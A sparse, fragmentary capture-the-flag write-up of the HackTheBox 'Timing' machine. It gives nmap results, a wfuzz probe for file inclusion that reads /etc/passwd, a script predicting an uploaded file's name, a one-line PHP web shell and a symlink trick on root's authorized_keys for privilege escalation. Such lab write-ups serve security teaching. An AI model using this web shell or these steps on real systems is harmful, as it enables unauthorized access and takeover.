HackTheBox-Timing

NMAP

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:5c:40:d7:c9:fe:ff:a8:83:c3:6e:cd:60:11:d2:eb (RSA)
| 256 18:c9:f7:b9:27:36:a1:16:59:23:35:84:34:31:b3:ad (ECDSA)
|_ 256 a2:2d:ee:db:4e:bf:f9:3f:8b:d4:cf:b4:12:d8:20:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Simple WebApp
|_Requested resource was ./login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On the webserver we can see a login page

wfuzz -c -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u "http://10.129.245.78/image.php?FUZZ=/etc/passwd" --hw 0
<?phpinclude_once "auth_check.php";if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
echo "No permission to access this panel!";
header('Location: ./index.php');
die();
}
?>

Foothold

<?php
$file_name = md5('$file_hash' . time()) . '_' . 'shell.php.jpg';
echo $file_name."\n";
?>
<?php
system($_GET['cmd']);
?>

Privilege Escalation (aaron)

Going into /opt folder we saw a back of the site in an archive

Privilege Escalation (root)

Doing sudo -l , aaron can run netutils as root user

Method #2

Other way to get root is to make symlink to /root/.ssh/authorized_keys which is the source and you can name the symlink anything you want but make sure to download the filename as the symlink

ln -s /root/.ssh/authorized_keys/ abc

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store